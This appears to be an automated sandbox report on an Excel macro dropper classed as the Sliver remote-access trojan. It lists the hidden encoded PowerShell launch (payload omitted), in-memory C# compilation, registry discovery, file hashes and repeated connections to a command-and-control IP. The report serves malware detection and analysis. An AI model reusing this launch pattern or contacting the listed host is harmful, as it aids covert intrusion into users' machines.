Malware Analysis Report

2024-11-15 05:22

Sample ID: 241110-1kbh7swdrc
Target: 1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b
SHA256: 1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b
Tags: macro macro_on_action sliver backdoor discovery execution trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b

Threat Level: Known bad

The file 1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b was found to be: Known bad.

Malicious Activity Summary

Tags: macro macro_on_action sliver backdoor discovery execution trojan

SliverRAT
Sliver RAT v2
Sliver family
Process spawned unexpected child process
Office macro that triggers on suspicious action
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-10 21:42

Signatures

Office macro that triggers on suspicious action

Tags: macro macro_on_action

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-10 21:42
Reported: 2024-11-10 21:43
Platform: win7-20240903-en
Max time kernel: 19s
Max time network: 19s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Sliver RAT v2

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1048 wrote to memory of 3064 | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (4 identical events)
PID 3064 wrote to memory of 2488 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (4 identical events)
PID 2488 wrote to memory of 2540 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (4 identical events)

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc [base64-encoded command omitted]

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6apyv-cj.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8641.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8640.tmp"

Network

Country | Destination | Domain | Proto
CH | 194.182.164.149:8080 | 194.182.164.149 | tcp

Files

memory/1048-1-0x000000007215D000-0x0000000072168000-memory.dmp
memory/1048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1048-2-0x00000000001F0000-0x00000000002F0000-memory.dmp
memory/1048-3-0x00000000001F0000-0x00000000002F0000-memory.dmp
memory/1048-6-0x00000000001F0000-0x00000000002F0000-memory.dmp
memory/1048-7-0x00000000001F0000-0x00000000002F0000-memory.dmp
memory/1048-9-0x00000000001F0000-0x00000000002F0000-memory.dmp
memory/1048-4-0x00000000001F0000-0x00000000002F0000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\6apyv-cj.cmdline

MD5 50667e81d82ea0396407d217431b3421
SHA1 2287b97de9ccde8bbda3074ed5018f3fd1fb91f9
SHA256 c782079ff164ece512be7e95e912f4245cac1c463eb0abc4fca25a0196f16f64
SHA512 410d076841815ee00dcdb94f69f8f1b7ab194bb082738187ad8df5b5a87ba786bcd6c2c252d5cfdaf8e81d1ce453b997646035093dfa92b76e802288cb7f61de

\??\c:\Users\Admin\AppData\Local\Temp\6apyv-cj.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\CSC8640.tmp

MD5 18cdd79a4c3f79b53642b025371f6442
SHA1 42636d5fe4e46f6ebfff39c8ad189411e8f07c9d
SHA256 133931259d58738136f2d7c9b31e5073d8c2bd2ed2ba788ac6972c84eedbe10e
SHA512 e9073291ef9fc5993f5d9ebd4d1e7d6f8fbd81279f10ba59ba3f1e04687a944f28868d2afcad007030bf72a20081b2efc72aa2bb75530856a68369df46da957b

C:\Users\Admin\AppData\Local\Temp\RES8641.tmp

MD5 e4958954769be4a0e5b4516db5e4b6f2
SHA1 c55499ecf09102c463b637d9037dd2584a3f9786
SHA256 81426fae309a4dac4822027edca43a6499464e15daa6e26cfb3a9963b529b57d
SHA512 ba9cdfcfdcff5dcea45f484fad7bddee46fc23c294bbec7db9f61247f9066041835bf105915bbbd796fa5973c738fcd12977e9bc4b0dade3cd1c413a410438ad

C:\Users\Admin\AppData\Local\Temp\6apyv-cj.dll

MD5 bfa41b18349a932f9e12022ca4207a1d
SHA1 672e05b2e8ddd714e7754781fdd3367548363902
SHA256 3bdb90384cc67fbf254901ea409ec1f1bdbfd86d913784a069a7c02f5d7be0c2
SHA512 a4b20f9e0095c8eeb6b5566f9a65e88d43bfc97d244f66a661f713953e1a055e8578e69524180714421d99d636749c84b5aee74bac557050a570fc6f5140621a

C:\Users\Admin\AppData\Local\Temp\6apyv-cj.pdb

MD5 875c9c01092d0c25817e99a415b63b03
SHA1 4167e82a8e408a0b20afd0588d1eff7db8466541
SHA256 43805c4b239ab1cb6eb6e1980d96c1618389e68f5ee9b97f68e9974970f5d4b0
SHA512 a97fa9f87ee25ed056c5e52d673bbdc093e3bd672b019c30067bb49bba8913d13bfad550821f77d3c536235558b14a8b4ae3bc3c7dca58e0a3a594c17f309531

C:\Users\Admin\AppData\Local\Temp\Cab92DF.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/1048-43-0x000000007215D000-0x0000000072168000-memory.dmp
memory/1048-44-0x00000000001F0000-0x00000000002F0000-memory.dmp
memory/3064-45-0x00000000068A0000-0x000000000731E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-10 21:42
Reported: 2024-11-10 21:43
Platform: win10v2004-20241007-en
Max time kernel: 58s
Max time network: 62s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Sliver RAT v2

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (6 identical rows)

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (25 identical events)

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1744153442574b3f301c5d8bcd802c22852ac87a80a9f315e7e4e50e5ecdd62b.xls"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc [base64-encoded command omitted]

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgf5j3bp\zgf5j3bp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB3A0.tmp" "c:\Users\Admin\AppData\Local\Temp\zgf5j3bp\CSC25C7100A10844DBB887329B8E6CD3D2.TMP"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 70.209.201.84.in-addr.arpa | udp
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
NL | 52.109.89.19:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 19.89.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp
CH | 194.182.164.149:8080 | 194.182.164.149 | tcp
US | 8.8.8.8:53 | 149.164.182.194.in-addr.arpa | udp
US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp
CH | 194.182.164.149:443 | (none recorded) | tcp
US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp
CH | 194.182.164.149:80 | 194.182.164.149 | tcp (10 consecutive identical connections)
US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp
CH | 194.182.164.149:80 | 194.182.164.149 | tcp
US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp
CH | 194.182.164.149:80 | 194.182.164.149 | tcp
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp
CH | 194.182.164.149:80 | 194.182.164.149 | tcp (10 consecutive identical connections)

Files

memory/3576-0-0x00007FFBDB2B0000-0x00007FFBDB2C0000-memory.dmp
memory/3576-1-0x00007FFC1B2CD000-0x00007FFC1B2CE000-memory.dmp
memory/3576-3-0x00007FFBDB2B0000-0x00007FFBDB2C0000-memory.dmp
memory/3576-2-0x00007FFBDB2B0000-0x00007FFBDB2C0000-memory.dmp
memory/3576-4-0x00007FFBDB2B0000-0x00007FFBDB2C0000-memory.dmp
memory/3576-5-0x00007FFBDB2B0000-0x00007FFBDB2C0000-memory.dmp
memory/3576-8-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-9-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-7-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-6-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-10-0x00007FFBD8F80000-0x00007FFBD8F90000-memory.dmp
memory/3576-12-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-11-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-14-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-13-0x00007FFBD8F80000-0x00007FFBD8F90000-memory.dmp
memory/3576-17-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-19-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-20-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-18-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-16-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-15-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-30-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-29-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g21p4ijb.0lp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2688-45-0x000002137FB20000-0x000002137FB42000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zgf5j3bp\zgf5j3bp.cmdline

MD5 47813e6635b8c125e86485fcf60c0b15
SHA1 88972a19d60c3f839a7d68c8dca470416c40e21b
SHA256 62ada42824d7d88e30511fa2d9aeeed46d0583c5ceeff1f6edef66824a27baa5
SHA512 70d1897cdb5c52078e85c6c9e450886f4760aac8f90cc463e586d5202799fc8e3db81ae2449ec295e7364ee1adfeddb7eaa65c25e5da6ca0f1499eec86f459b9

\??\c:\Users\Admin\AppData\Local\Temp\zgf5j3bp\zgf5j3bp.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\zgf5j3bp\CSC25C7100A10844DBB887329B8E6CD3D2.TMP

MD5 dee242d091f553198fe816f1d40c2adb
SHA1 c47417ae41ac38b45c91c9d471a8d44340d9ff76
SHA256 f98935426d043619edf3c471ddca3cf215bbaa65703d094acca64db73caab970
SHA512 3d57f0a806a7085a88bb44fd362ad1ff8af75d22329ac08795faae950912eeca50086535d0c6eae397d72986fe6c40a5f3c420d461cf13f41784e5c9ecff113e

C:\Users\Admin\AppData\Local\Temp\RESB3A0.tmp

MD5 080f0de8cc66f28d18079d9ca52ddc84
SHA1 fd831ca90928e5b2d59678e13b2758a70ccc2e88
SHA256 7176f6e0bf54d6f4d492d956f889afeb1ac223043efea3350b1dca8941c88339
SHA512 97ff8cf026c0069efce135caadac41fa4b203d3dd1440e4a6fbf5e1ba62b5742fcbdb664300595a3075c01fa7dbca19e1d6bb9df4e026005a6fce00103380534

C:\Users\Admin\AppData\Local\Temp\zgf5j3bp\zgf5j3bp.dll

MD5 1bc86bd9132f66e654db7b4f2115816e
SHA1 f1ff16efddd53ccff185e64e1fc26f36a579704f
SHA256 5196cb129396f80181264c5dc7978bbf97398e04a9e393b0e76cdcb017b9bc30
SHA512 e6683ec69be9749ff4424f6a156e814baaeda765ca95f735969d6ef210770c65208388d5fcb700d3e027ec0ab3f7fc707527f261b8ee529673f18f24bd106ff4

memory/2688-58-0x0000021300270000-0x0000021300278000-memory.dmp
memory/3576-62-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/3576-63-0x00007FFC1B2CD000-0x00007FFC1B2CE000-memory.dmp
memory/2688-64-0x0000021318920000-0x000002131939E000-memory.dmp
memory/2688-66-0x0000021319E20000-0x000002131A906000-memory.dmp
memory/2688-67-0x0000021319E20000-0x000002131A906000-memory.dmp
memory/2688-65-0x0000021319E20000-0x000002131A906000-memory.dmp
memory/3576-72-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp
memory/2688-68-0x0000021319E20000-0x000002131A906000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 a2e5343e64db287a14f3ad5f7bb54189
SHA1 abb5806994fa1b17270cfdd259c32039cd4607f4
SHA256 bc0292e87c6e2bf3eebc65f1dd56769c5e0f00bee11ce543483b815df4b4bb56
SHA512 0399ef9d8f2c565663c896e2c9b8c76eeb503d95462b68f7ecb06a65ef48cd61f9fd133945844d75226b4dfebcfed4f968d77516c959a5259cc09df75f0e3529

memory/2688-78-0x0000021319E20000-0x000002131A906000-memory.dmp